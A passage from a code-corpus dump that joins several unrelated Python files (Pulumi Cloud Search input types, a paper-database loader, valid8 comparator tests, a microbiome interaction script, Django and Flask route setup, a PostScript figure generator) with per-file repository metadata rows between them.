:param pulumi.Input[int] num_suggestions: Maximum number of suggestions allowed from a source. No limits will be set on results if this value is less than or equal to 0.
"""
if num_results is not None:
pulumi.set(__self__, "num_results", num_results)
if num_suggestions is not None:
pulumi.set(__self__, "num_suggestions", num_suggestions)
@property
@pulumi.getter(name="numResults")
def num_results(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of results allowed from a datasource in a result page as long as results from other sources are not exhausted. Value specified must not be negative. A default value is used if this value is equal to 0. To disable crowding, set the value greater than 100.
"""
return pulumi.get(self, "num_results")
@num_results.setter
def num_results(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_results", value)
@property
@pulumi.getter(name="numSuggestions")
def num_suggestions(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of suggestions allowed from a source. No limits will be set on results if this value is less than or equal to 0.
"""
return pulumi.get(self, "num_suggestions")
@num_suggestions.setter
def num_suggestions(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_suggestions", value)
@pulumi.input_type
class SourceScoringConfigArgs:
def __init__(__self__, *,
source_importance: Optional[pulumi.Input['SourceScoringConfigSourceImportance']] = None):
"""
Set the scoring configuration. This allows modifying the ranking of results for a source.
:param pulumi.Input['SourceScoringConfigSourceImportance'] source_importance: Importance of the source.
"""
if source_importance is not None:
pulumi.set(__self__, "source_importance", source_importance)
@property
@pulumi.getter(name="sourceImportance")
def source_importance(self) -> Optional[pulumi.Input['SourceScoringConfigSourceImportance']]:
"""
Importance of the source.
"""
return pulumi.get(self, "source_importance")
@source_importance.setter
def source_importance(self, value: Optional[pulumi.Input['SourceScoringConfigSourceImportance']]):
pulumi.set(self, "source_importance", value)
@pulumi.input_type
class SourceArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
predefined_source: Optional[pulumi.Input['SourcePredefinedSource']] = None):
"""
Defines sources for the suggest/search APIs.
:param pulumi.Input[str] name: Source name for content indexed by the Indexing API.
:param pulumi.Input['SourcePredefinedSource'] predefined_source: Predefined content source for Google Apps.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if predefined_source is not None:
pulumi.set(__self__, "predefined_source", predefined_source)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Source name for content indexed by the Indexing API.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="predefinedSource")
def predefined_source(self) -> Optional[pulumi.Input['SourcePredefinedSource']]:
"""
Predefined content source for Google Apps.
"""
return pulumi.get(self, "predefined_source")
@predefined_source.setter
def predefined_source(self, value: Optional[pulumi.Input['SourcePredefinedSource']]):
pulumi.set(self, "predefined_source", value)
@pulumi.input_type
class ValueFilterArgs:
def __init__(__self__, *,
operator_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input['ValueArgs']] = None):
"""
:param pulumi.Input[str] operator_name: The `operator_name` applied to the query, such as *price_greater_than*. The filter can work against both types of filters defined in the schema for your data source: 1. `operator_name`, where the query filters results by the property that matches the value. 2. `greater_than_operator_name` or `less_than_operator_name` in your schema. The query filters the results for the property values that are greater than or less than the supplied value in the query.
:param pulumi.Input['ValueArgs'] value: The value to be compared with.
"""
if operator_name is not None:
pulumi.set(__self__, "operator_name", operator_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="operatorName")
def operator_name(self) -> Optional[pulumi.Input[str]]:
"""
The `operator_name` applied to the query, such as *price_greater_than*. The filter can work against both types of filters defined in the schema for your data source: 1. `operator_name`, where the query filters results by the property that matches the value. 2. `greater_than_operator_name` or `less_than_operator_name` in your schema. The query filters the results for the property values that are greater than or less than the supplied value in the query.
"""
return pulumi.get(self, "operator_name")
@operator_name.setter
def operator_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input['ValueArgs']]:
"""
The value to be compared with.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input['ValueArgs']]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ValueArgs:
def __init__(__self__, *,
boolean_value: Optional[pulumi.Input[bool]] = None,
date_value: Optional[pulumi.Input['DateArgs']] = None,
double_value: Optional[pulumi.Input[float]] = None,
integer_value: Optional[pulumi.Input[str]] = None,
string_value: Optional[pulumi.Input[str]] = None,
timestamp_value: Optional[pulumi.Input[str]] = None):
"""
Definition of a single value with generic type.
"""
if boolean_value is not None:
pulumi.set(__self__, "boolean_value", boolean_value)
if date_value is not None:
pulumi.set(__self__, "date_value", date_value)
if double_value is not None:
pulumi.set(__self__, "double_value", double_value)
if integer_value is not None:
pulumi.set(__self__, "integer_value", integer_value)
if string_value is not None:
pulumi.set(__self__, "string_value", string_value)
if timestamp_value is not None:
pulumi.set(__self__, "timestamp_value", timestamp_value)
@property
@pulumi.getter(name="booleanValue")
def boolean_value(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "boolean_value")
@boolean_value.setter
def boolean_value(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "boolean_value", value)
@property
@pulumi.getter(name="dateValue")
def date_value(self) -> Optional[pulumi.Input['DateArgs']]:
return pulumi.get(self, "date_value")
@date_value.setter
def date_value(self, value: Optional[pulumi.Input['DateArgs']]):
pulumi.set(self, "date_value", value)
@property
@pulumi.getter(name="doubleValue")
def double_value(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "double_value")
@double_value.setter
def double_value(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "double_value", value)
@property
@pulumi.getter(name="integerValue")
def integer_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "integer_value")
@integer_value.setter
def integer_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "integer_value", value)
@property
@pulumi.getter(name="stringValue")
def string_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "string_value")
@string_value.setter
def string_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "string_value", value)
@property
@pulumi.getter(name="timestampValue")
def timestamp_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "timestamp_value")
@timestamp_value.setter
def timestamp_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp_value", value)
| 45.052425 | 531 | 0.679738 | 4,232 | 34,375 | 5.352552 | 0.093336 | 0.085467 | 0.100653 | 0.049797 | 0.730796 | 0.575137 | 0.508035 | 0.438019 | 0.402084 | 0.37798 | 0 | 0.002389 | 0.220713 | 34,375 | 762 | 532 | 45.111549 | 0.843213 | 0.321629 | 0 | 0.294492 | 1 | 0 | 0.137133 | 0.032794 | 0 | 0 | 0 | 0 | 0 | 1 | 0.20339 | false | 0 | 0.03178 | 0.016949 | 0.353814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
46e3a5a2a04d61359d2e88149a9d0578cc769b76 | 1,689 | py | Python | pysrc/papers/db/loaders.py | JetBrains-Research/pubtrends | 5352bec2cca3321f8554d8e60728fe6d8494edcb | [
"Apache-2.0"
] | 7 | 2022-01-10T15:48:31.000Z | 2022-02-28T11:42:15.000Z | pysrc/papers/db/loaders.py | JetBrains-Research/pubtrends | 5352bec2cca3321f8554d8e60728fe6d8494edcb | [
"Apache-2.0"
] | 12 | 2021-11-04T17:21:10.000Z | 2022-02-23T15:01:10.000Z | pysrc/papers/db/loaders.py | JetBrains-Research/pubtrends | 5352bec2cca3321f8554d8e60728fe6d8494edcb | [
"Apache-2.0"
] | null | null | null | from pysrc.papers.db.pm_postgres_loader import PubmedPostgresLoader
from pysrc.papers.db.postgres_connector import PostgresConnector
from pysrc.papers.db.ss_postgres_loader import SemanticScholarPostgresLoader
from pysrc.papers.utils import PUBMED_ARTICLE_BASE_URL, SEMANTIC_SCHOLAR_BASE_URL
from pysrc.prediction.ss_arxiv_loader import SSArxivLoader
from pysrc.prediction.ss_pubmed_loader import SSPubmedLoader
class Loaders:
@staticmethod
def source(loader, test=False):
# Determine source to provide correct URLs to articles,
# see #get_loader_and_url_prefix
# TODO: Bad design, refactor
if isinstance(loader, PubmedPostgresLoader):
return 'Pubmed'
elif isinstance(loader, SemanticScholarPostgresLoader):
return 'Semantic Scholar'
elif isinstance(loader, SSArxivLoader):
return 'SSArxiv'
elif isinstance(loader, SSPubmedLoader):
return 'SSPubmed'
elif not test:
raise TypeError(f'Unknown loader {loader}')
@staticmethod
def get_loader_and_url_prefix(source, config):
if PostgresConnector.postgres_configured(config):
if source == 'Pubmed':
return PubmedPostgresLoader(config), PUBMED_ARTICLE_BASE_URL
elif source == 'Semantic Scholar':
return SemanticScholarPostgresLoader(config), SEMANTIC_SCHOLAR_BASE_URL
else:
raise ValueError(f"Unknown source {source}")
else:
raise ValueError("No database configured")
@staticmethod
def get_loader(source, config):
return Loaders.get_loader_and_url_prefix(source, config)[0]
| 41.195122 | 87 | 0.706927 | 179 | 1,689 | 6.47486 | 0.351955 | 0.046592 | 0.051769 | 0.044003 | 0.075065 | 0.056946 | 0.056946 | 0 | 0 | 0 | 0 | 0.000767 | 0.228538 | 1,689 | 40 | 88 | 42.225 | 0.888718 | 0.065127 | 0 | 0.151515 | 0 | 0 | 0.080686 | 0 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0.030303 | 0.515152 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
46e3ff53fb1b941d4c468448c6fb18d3fa28aa71 | 1,249 | py | Python | valid8/tests/validation_lib/test_validators_comparables.py | smarie/python-validate | c8a10ccede1c0782355439b0966f532bf00dfcab | [
"BSD-3-Clause"
] | 26 | 2018-01-10T03:44:19.000Z | 2021-11-28T07:56:31.000Z | valid8/tests/validation_lib/test_validators_comparables.py | smarie/python-validate | c8a10ccede1c0782355439b0966f532bf00dfcab | [
"BSD-3-Clause"
] | 55 | 2017-11-06T14:45:47.000Z | 2021-05-12T08:28:11.000Z | valid8/tests/validation_lib/test_validators_comparables.py | smarie/python-valid8 | c8a10ccede1c0782355439b0966f532bf00dfcab | [
"BSD-3-Clause"
] | null | null | null | import pytest
from valid8.validation_lib import gt, gts, lt, lts, between, NotInRange, TooSmall, TooBig
def test_gt():
""" tests that the gt() function works """
assert gt(1)(1)
with pytest.raises(TooSmall):
gt(-1)(-1.1)
def test_gts():
""" tests that the gts() function works """
with pytest.raises(TooSmall):
gts(1)(1)
assert gts(-1)(-0.9)
def test_lt():
""" tests that the lt() function works """
assert lt(1)(1)
with pytest.raises(TooBig):
lt(-1)(-0.9)
def test_lts():
""" tests that the lts() function works """
with pytest.raises(TooBig):
lts(1)(1)
assert lts(-1)(-1.1)
def test_between():
""" tests that the between() function works """
assert between(0, 1)(0)
assert between(0, 1)(1)
with pytest.raises(NotInRange):
between(0, 1)(-0.1)
with pytest.raises(NotInRange):
between(0, 1)(1.1)
def test_numpy_nan():
""" Test that a numpy nan is correctly handled """
import numpy as np
with pytest.raises(TooSmall) as exc_info:
gt(5.1)(np.nan)
with pytest.raises(TooBig) as exc_info:
lt(5.1)(np.nan)
with pytest.raises(NotInRange) as exc_info:
between(5.1, 5.2)(np.nan)
| 21.534483 | 89 | 0.598078 | 190 | 1,249 | 3.873684 | 0.205263 | 0.029891 | 0.195652 | 0.092391 | 0.355978 | 0.160326 | 0.160326 | 0.097826 | 0 | 0 | 0 | 0.045648 | 0.245797 | 1,249 | 57 | 90 | 21.912281 | 0.735669 | 0.183347 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.181818 | true | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
46fa825c8cf74b729c7a17900171bc2636e74e47 | 5,801 | py | Python | .ipynb_checkpoints/GenerateLambdas-checkpoint.py | ponte-vecchio/Deepfake-Microbiomes | d53b1a7fcd1edc1d9eacfd41783c533ce4dac967 | [
"MIT"
] | 2 | 2021-04-22T13:59:28.000Z | 2021-06-30T23:02:31.000Z | .ipynb_checkpoints/GenerateLambdas-checkpoint.py | ponte-vecchio/Deepfake-Microbiomes | d53b1a7fcd1edc1d9eacfd41783c533ce4dac967 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/GenerateLambdas-checkpoint.py | ponte-vecchio/Deepfake-Microbiomes | d53b1a7fcd1edc1d9eacfd41783c533ce4dac967 | [
"MIT"
] | 1 | 2021-07-04T00:30:00.000Z | 2021-07-04T00:30:00.000Z | import numpy as np
import pandas as pd
def GenerateLambdasFromExcel(Experiment,File = "Pairwise_Chemostat.xlsx",version = "Equilibrium",mu = 1):
Community = Experiment.Community
Invader = Experiment.Invader
RelativeAbundanceAll = pd.read_excel(File,sheet_name = "Relative_Abundance",index_col = 0)
CommunityIndex = []
foundList = []
for CM in Community:
if len(CM):
try:
CommunityIndex += [RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find(CM)>0)][0]]
foundList += [CM]
except IndexError:
print(CM + " not found")
if Invader != None:
try:
InvaderIndex = RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find(Invader)>0)][0]
except IndexError:
print("Invader Not Found")
return None
CommunityIndex = [cm for cm in np.unique(CommunityIndex) if cm != InvaderIndex]
#print(RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find("intestini")>0)])
###Get a list of community members.
All = list(CommunityIndex) + [InvaderIndex]
else:
CommunityIndex = np.unique(CommunityIndex)
#print(RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find("intestini")>0)])
###Get a list of community members.
All = list(CommunityIndex)
RelativeAbundance = RelativeAbundanceAll.loc[All,All]
## \lambda_i^j = \alpha_{ji} - \alpha_{jj} - \mu*(\alpha_{ij} - \alpha_{ji})
### \mu = 1/[(R_0 - 1)k]
#### k -> mean interaction value. No idea how to estimate.
#### R_0 Basic reproduction number. Similarly no idea, except that R_0>1
mean_interaction = mu
if version == "Equilibrium":
AllLambdas = pd.DataFrame(columns = RelativeAbundance.columns, index = RelativeAbundance.index)
for i in range(len(AllLambdas.index)):
for j in range(i+1):
if i==j:
AllLambdas.iloc[i,j] = 0
elif RelativeAbundance.iloc[i,j] == 0:
AllLambdas.iloc[i,j] = -mean_interaction
AllLambdas.iloc[j,i] = mean_interaction
elif RelativeAbundance.iloc[j,i] == 0:
AllLambdas.iloc[i,j] = mean_interaction
AllLambdas.iloc[j,i] = -mean_interaction
else:
AllLambdas.iloc[i,j] = mean_interaction*RelativeAbundance.iloc[i,j]/(1-RelativeAbundance.iloc[i,j])
AllLambdas.iloc[j,i] = mean_interaction
elif version == "LogRatio":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
TotalMass = TotalMassAll.loc[All,All]
GrowthMass = RelativeAbundance*TotalMass
GrowthMass.replace(to_replace = 0, value = 0.001, inplace = True)
Alphas = np.log((GrowthMass.T/np.diag(GrowthMass)).T)
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
elif version == "Difference":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
TotalMass = TotalMassAll.loc[All,All]
GrowthMass = RelativeAbundance*TotalMass
Alphas = (GrowthMass.T - np.diag(GrowthMass)).T
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
CommLambdas = AllLambdas.loc[CommunityIndex,CommunityIndex]
if Invader != None:
LambdaInvaderComm = AllLambdas.loc[InvaderIndex].values[:-1]
LambdaCommInvader = AllLambdas.loc[:,InvaderIndex].values[:-1]
return CommLambdas,LambdaInvaderComm,LambdaCommInvader,foundList
else:
return CommLambdas,foundList
def GenerateLambdasFromExcelAllPairs(File,version = "Equilibrium",mu = 1):
RelativeAbundanceAll = pd.read_excel(File,sheet_name = "Relative_Abundance",index_col = 0)
All = RelativeAbundanceAll.index
## \lambda_i^j = \alpha_{ji} - \alpha_{jj} - \mu*(\alpha_{ij} - \alpha_{ji})
### \mu = 1/[(R_0 - 1)k]
#### k -> mean interaction value. No idea how to estimate.
#### R_0 Basic reproduction number. Similarly no idea, except that R_0>1
mean_interaction = mu
if version == "Equilibrium":
AllLambdas = pd.DataFrame(columns = RelativeAbundanceAll.columns, index = RelativeAbundanceAll.index)
for i in range(len(AllLambdas.index)):
for j in range(i+1):
if i==j:
AllLambdas.iloc[i,j] = 0
elif RelativeAbundanceAll.iloc[i,j] == 0:
AllLambdas.iloc[i,j] = -mean_interaction
AllLambdas.iloc[j,i] = mean_interaction
elif RelativeAbundanceAll.iloc[j,i] == 0:
AllLambdas.iloc[i,j] = mean_interaction
AllLambdas.iloc[j,i] = -mean_interaction
else:
AllLambdas.iloc[i,j] = mean_interaction*RelativeAbundanceAll.iloc[i,j]/(1-RelativeAbundanceAll.iloc[i,j])
AllLambdas.iloc[j,i] = mean_interaction
elif version == "LogRatio":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
GrowthMass = RelativeAbundanceAll*TotalMassAll
GrowthMass.replace(to_replace = 0, value = 0.001, inplace = True)
Alphas = np.log((GrowthMass.T/np.diag(GrowthMass)).T)
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
elif version == "Difference":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
GrowthMass = RelativeAbundanceAll*TotalMassAll
Alphas = (GrowthMass.T - np.diag(GrowthMass)).T
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
return AllLambdas
| 40.006897 | 125 | 0.625582 | 648 | 5,801 | 5.512346 | 0.165123 | 0.010078 | 0.023516 | 0.035834 | 0.700448 | 0.682531 | 0.682531 | 0.682531 | 0.646697 | 0.646697 | 0 | 0.011124 | 0.256163 | 5,801 | 144 | 126 | 40.284722 | 0.816686 | 0.11929 | 0 | 0.617021 | 1 | 0 | 0.042956 | 0.004532 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.021277 | 0 | 0.085106 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
46fccb83735c70f048922fbf47158f5d55003417 | 419 | py | Python | currencies/tests/test_urls.py | guestready/django-currencies | e41402008f50a20cf5eb859833d7825c42619c2b | [
"BSD-3-Clause"
] | 69 | 2015-01-08T09:58:56.000Z | 2021-06-16T12:48:21.000Z | currencies/tests/test_urls.py | guestready/django-currencies | e41402008f50a20cf5eb859833d7825c42619c2b | [
"BSD-3-Clause"
] | 55 | 2015-01-27T15:03:19.000Z | 2022-03-07T00:59:03.000Z | currencies/tests/test_urls.py | guestready/django-currencies | e41402008f50a20cf5eb859833d7825c42619c2b | [
"BSD-3-Clause"
] | 58 | 2015-01-06T01:57:11.000Z | 2022-02-28T19:50:43.000Z | # -*- coding: utf-8 -*-
from django.conf.urls import *
from django.views.generic import TemplateView
urlpatterns = [
url(r'^currencies/', include('currencies.urls')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
url(r'^context_processor$', TemplateView.as_view(template_name='context_processor.html')),
url(r'^context_tag$', TemplateView.as_view(template_name='context_tag.html')),
]
| 34.916667 | 94 | 0.718377 | 54 | 419 | 5.388889 | 0.462963 | 0.054983 | 0.185567 | 0.268041 | 0.357388 | 0.254296 | 0 | 0 | 0 | 0 | 0 | 0.00266 | 0.102625 | 419 | 11 | 95 | 38.090909 | 0.771277 | 0.050119 | 0 | 0 | 0 | 0 | 0.275253 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
2000f783fffdbadf726d700fb6aba4e46ec3a2dc | 6,081 | py | Python | spiro/elastfe.py | behdad/fontcrunch | a8a41623f49feeeb2ba29e9e90b19a9637113c6d | [
"Apache-2.0"
] | 1 | 2021-01-07T07:56:24.000Z | 2021-01-07T07:56:24.000Z | spiro/elastfe.py | behdad/fontcrunch | a8a41623f49feeeb2ba29e9e90b19a9637113c6d | [
"Apache-2.0"
] | null | null | null | spiro/elastfe.py | behdad/fontcrunch | a8a41623f49feeeb2ba29e9e90b19a9637113c6d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.
#
# Figures for finite element model of elastica
import sys
from math import *
def prolog():
print '%!PS-Adobe-3.0 EPSF'
print '%%EndComments'
print '%%EndProlog'
print '%%Page: 1 1'
print '/cshow {dup stringwidth exch -.5 mul exch rmoveto show} bind def'
print '/circle { ss 0 moveto currentpoint exch ss sub exch ss 0 360 arc } bind def'
def eps_trailer():
print '%%EOF'
def arrow(x0, y0, len, th, headlen = 5, headwid = 6):
print 'gsave', x0, y0, 'translate', th, 'rotate'
print 0, 0, 'moveto', len - .5 * headlen, 0, 'lineto stroke'
print len, 0, 'moveto', -headlen, -.5 * headwid, 'rlineto', 0, headwid, 'rlineto fill'
print 'grestore'
def strutfig():
prolog()
print '/Times-Roman 12 selectfont'
print 3, 'setlinewidth'
print 100, 100, 'moveto', 200, 0, 'rlineto stroke'
print .75, 'setlinewidth'
arrow(100, 100, 50, 180)
arrow(300, 100, 50, 0)
print 75, 105, 'moveto (T) cshow'
print 325, 105, 'moveto (T) cshow'
print 'showpage'
eps_trailer()
def pivotfig():
prolog()
th = 20
moment = 25
print 3, 'setlinewidth'
print 'gsave', 300, 100, 'translate', -.5 * th, 'rotate'
print 0, 0, 'moveto', -150, 0, 'rlineto stroke'
print .75, 'setlinewidth'
print 0, 0, 'moveto', 50, 0, 'rlineto stroke'
print 40, 0, 'moveto', 0, 0, 40, 0, th, 'arc stroke'
arrow(-150, 0, moment, 270)
print 'grestore'
print 'gsave', 300, 100, 'translate', .5 * th, 'rotate'
print 0, 0, 'moveto', 150, 0, 'rlineto stroke'
print '/ss', 4, 'def circle fill'
print .75, 'setlinewidth'
arrow(150, 0, moment, 270)
print 'grestore'
print .75, 'setlinewidth'
arrow(300, 100, 2 * moment * cos(.5 * th * pi / 180), 90)
print '/Symbol 12 selectfont'
print 345, 96, 'moveto (Dq) show'
print '/Times-Roman 12 selectfont'
print 155, 109, 'moveto (M) show'
print 455, 112, 'moveto (M) show'
print 303, 125, 'moveto (2M) show 1 0 rmoveto (cos) show'
print '/Symbol 12 selectfont 1 0 rmoveto (\(Dq/2\)) show'
print 'showpage'
eps_trailer()
def chainfig():
prolog()
th0 = 25
th1 = 30
th2 = 35
m = 1.5
thrad = 35
print 3, 'setlinewidth'
print 'gsave', 300, 100, 'translate', -1 * th1, 'rotate'
print 'gsave', -150, 0, 'translate', -1 * th0, 'rotate'
print 0, 0, 'moveto', -100, 0, 'rlineto stroke'
print .75, 'setlinewidth'
print 0, 0, 'moveto', 50, 0, 'rlineto stroke'
print thrad, 0, 'moveto', 0, 0, thrad, 0, th0, 'arc stroke'
print '/ss', 4, 'def circle fill'
print 'grestore'
print 0, 0, 'moveto', -150, 0, 'rlineto stroke'
print .75, 'setlinewidth'
#print 0, 0, 'moveto', 50, 0, 'rlineto stroke'
arrow(0, 0, 50, 0)
arrow(0, 0, m * th0, 270)
print thrad, 0, 'moveto', 0, 0, thrad, 0, th1, 'arc stroke'
print 'grestore'
print 'gsave', 300, 100, 'translate', 0, 'rotate'
print 0, 0, 'moveto', 150, 0, 'rlineto stroke'
print '/ss', 4, 'def circle fill'
print .75, 'setlinewidth'
arrow(0, 0, 50, 180)
arrow(0, 0, m * th1 * 2 * cos(.5 * th1 * pi/180), 90 - .5 * th1)
arrow(0, 0, m * th2, 270)
print 150, 0, 'translate'
print 0, 0, 'moveto', 50, 0, 'rlineto stroke'
print thrad, 0, 'moveto', 0, 0, thrad, 0, th2, 'arc stroke'
print 'grestore'
print 'gsave', 450, 100, 'translate', 1 * th2, 'rotate'
print 0, 0, 'moveto', 100, 0, 'rlineto stroke'
print '/ss', 4, 'def circle fill'
print 'grestore'
print '/Symbol 12 selectfont'
print 162 + thrad, 142, 'moveto (Dq) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (0) show'
print '/Symbol 12 selectfont'
print 302 + thrad, 85, 'moveto (Dq) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (1) show'
print '/Symbol 12 selectfont'
print 452 + thrad, 108, 'moveto (Dq) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (2) show'
print '/Times-Roman 12 selectfont'
print 233, 96, 'moveto (T) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (1) show'
print '/Times-Roman 12 selectfont'
print 345, 70, 'moveto (T) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (0) show'
print '/Times-Roman 12 selectfont'
print 286 - 10 * m, 92 - 23 * m, 'moveto (M) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (0) show'
print '/Times-Roman 12 selectfont'
print 296 + 14 * m, 102 + 58 * m, 'moveto (2M) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (1) show'
print '/Times-Roman 12 selectfont 1 2 rmoveto (cos\() show'
print '/Symbol 12 selectfont 1 0 rmoveto (Dq) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (1) show'
print '/Times-Roman 12 selectfont 0 2 rmoveto (/2\)) show'
print '/Times-Roman 12 selectfont'
print 296, 92 - 36 * m, 'moveto (M) show'
print '/Times-Roman 9 selectfont 0 -2 rmoveto (2) show'
print '/Times-Roman 12 selectfont'
print 240, 140, 'moveto (0) show'
print 375, 105, 'moveto (1) show'
print 495, 140, 'moveto (2) show'
print 'showpage'
eps_trailer()
if __name__ == '__main__':
figname = sys.argv[1]
if len(figname) > 4 and figname[-4:] == '.pdf': figname = figname[:-4]
if figname == 'strutfig':
strutfig()
elif figname == 'pivotfig':
pivotfig()
elif figname == 'chainfig':
chainfig()
| 35.354651 | 90 | 0.617004 | 901 | 6,081 | 4.150943 | 0.225305 | 0.06738 | 0.076203 | 0.091444 | 0.550535 | 0.519786 | 0.456417 | 0.435294 | 0.394118 | 0.394118 | 0 | 0.104807 | 0.240585 | 6,081 | 171 | 91 | 35.561404 | 0.705067 | 0.124815 | 0 | 0.423358 | 0 | 0 | 0.406904 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.014599 | null | null | 0.708029 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
2022075e4ea2fb0fe56fd0893ae255992ccd6f7b | 640 | py | Python | resources/routes.py | costayca/SmallAPIUserAndIngredients | 0806274599b1e7d9a48f8a3d8bd5cd4355f9d01b | [
"MIT"
] | null | null | null | resources/routes.py | costayca/SmallAPIUserAndIngredients | 0806274599b1e7d9a48f8a3d8bd5cd4355f9d01b | [
"MIT"
] | null | null | null | resources/routes.py | costayca/SmallAPIUserAndIngredients | 0806274599b1e7d9a48f8a3d8bd5cd4355f9d01b | [
"MIT"
] | null | null | null | from .movie import MovieApi, MoviesApi
from .auth import SignupApi, LoginApi
from .ingredient import IngredientApi, IngredientsApi
# from .kerasApi import KerasApi
from .fastaiApi import FastaiApi
def initialize_routes(api):
api.add_resource(MoviesApi, '/api/movies')
api.add_resource(MovieApi, '/api/movies/<id>')
api.add_resource(IngredientsApi, '/api/ingredients')
api.add_resource(IngredientApi, '/api/ingredients/<id>')
api.add_resource(SignupApi, '/api/auth/signup')
api.add_resource(LoginApi, '/api/auth/login')
# api.add_resource(KerasApi, '/api/keras')
